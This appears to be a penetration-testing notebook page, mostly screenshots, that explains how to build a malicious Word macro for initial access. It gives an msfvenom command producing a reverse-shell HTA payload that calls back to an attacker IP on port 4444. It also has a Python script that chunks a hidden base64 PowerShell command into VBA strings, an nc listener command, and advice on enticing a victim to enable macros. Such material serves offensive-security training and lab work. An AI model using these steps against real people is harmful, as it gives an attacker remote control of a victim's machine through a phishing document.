# MSOffice macro attack **Using Macros for attacks, Open word --→ View --→ Macros** ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FKyhahydY0Z4V2WIHVQh1%2F1.png?alt=media\&token=ce3202d9-1373-4d5b-8534-bcc77623850e) **Create a new macro** ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2Fd1k8FjQEDUOkHxlZMd9C%2F2.png?alt=media\&token=9bf633c5-1392-4344-bffa-b0b304c6723f) ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FG1sRoIQ6k89QmAPnfsoZ%2F3.png?alt=media\&token=5b8bb084-722a-4e60-ab2d-4125049407d5) ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2F23h2OE0ceyej7qEzuDnt%2F4.png?alt=media\&token=78c14aae-0ba6-48e4-af34-46efdf671e26) **We must save the containing document as either .docm or the older .doc format, which supports embedded macros, but must avoid the .docx format, which does not support them.** ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FVdVdFpsW1ReerskHuu7n%2F5.png?alt=media\&token=24161601-cdae-40c8-b12d-2eb0f9d846fb) **Save on Desktop** ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FC2m4iyFnI7oEJZ76SsR7%2F6.png?alt=media\&token=35fc366f-12bc-47e8-8257-6513a521b46c) **Click on EvilMacro and enable content to trigger the script** ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FOX7RsPYFvnsQ1rwZdM8b%2F7.png?alt=media\&token=2b9831c5-5b1e-44f7-978d-d18cda102787) **Macro triggers cmd.exe** ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FDgLAj7cuHOuKqnxeWN2p%2F8.png?alt=media\&token=3d22fb23-4c4e-4549-9a24-366512828837) **#Using Powershell and a Base64 encoded payload to get a reverse shell** ``` sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.177 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta ``` ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2F3d7knQLh4mYsC0n0tC6k%2F9.png?alt=media\&token=1e4b26ef-8cb9-4391-8f0e-42484f22e953) Edit the EvilMacro ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FfKqpJoOTr2mzV78zw89r%2F10.png?alt=media\&token=1b162961-d0b4-4492-be79-0b530af0ae07) **Since VBA as a limit on the length of strings we have to split the command into chunks before running the exploit.** ``` #Python3 script str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....." n = 50 for i in range(0, len(str), n): print "Str = Str + " + '"' + str[i:i+n] + '"' ``` ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2F4vxIzfrZTWxg98inJ3Kh%2F11.png?alt=media\&token=cb87107b-b98a-4da5-bc40-cf4ec766c322) ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FLeL7H8yASrw3eyyC77ej%2F12.png?alt=media\&token=e1c74c4a-51f8-42ae-b18f-1787c64ba56d) **#Insert the macro** ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2F0wkjiCKtFlVcz9PlQZNC%2F13.png?alt=media\&token=b78a6173-2a4f-45a6-b337-1c188b898650) ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2Fr6HGgjEWqKd0IHAD1wT6%2F14.png?alt=media\&token=e06fa5e9-6117-4d65-9e6c-4bed6e378825) **Start a nc listener on port 4444** `nc -nvlp 4444` You have to save the document as Word 1997-2003 Version as further versions are not vulnerable Open the file and enable macros In an engagement scenario the victim has to be enticed to click on it and enable macros(unlikely) ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2F9EbTyXlFj299VMEjhOWe%2F15.png?alt=media\&token=149fb060-7fbe-4094-b47b-0330e87effa0) **Catch the revshell** ![](https://3410633120-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FV4VjgPvE4pGDuFNzpWxG%2Fuploads%2FssdMfv0kixkXU9Y4gOk2%2F16.png?alt=media\&token=08daa4a8-0603-4a73-aae2-13bde16a486b)